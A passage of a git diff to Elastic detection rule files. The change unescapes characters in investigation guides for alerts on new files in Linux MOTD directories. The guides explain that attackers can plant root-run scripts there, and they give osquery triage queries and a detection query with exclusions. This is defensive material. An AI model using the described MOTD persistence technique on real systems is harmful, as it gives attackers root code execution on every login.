'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\") and not file.extension : \"swp\"\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json index 29db3d7b517..5c6d9b27769 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\" or \"/kaniko/executor\") and not \nfile.extension : (\"swp\" or \"swx\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json index ef6e5ab68e2..81bbf497861 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\" or \"/kaniko/executor\") and not \nfile.extension : (\"swp\" or \"swx\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json index a3478f63e7c..73a93577a44 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json @@ -18,7 +18,7 @@ "file.path", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - 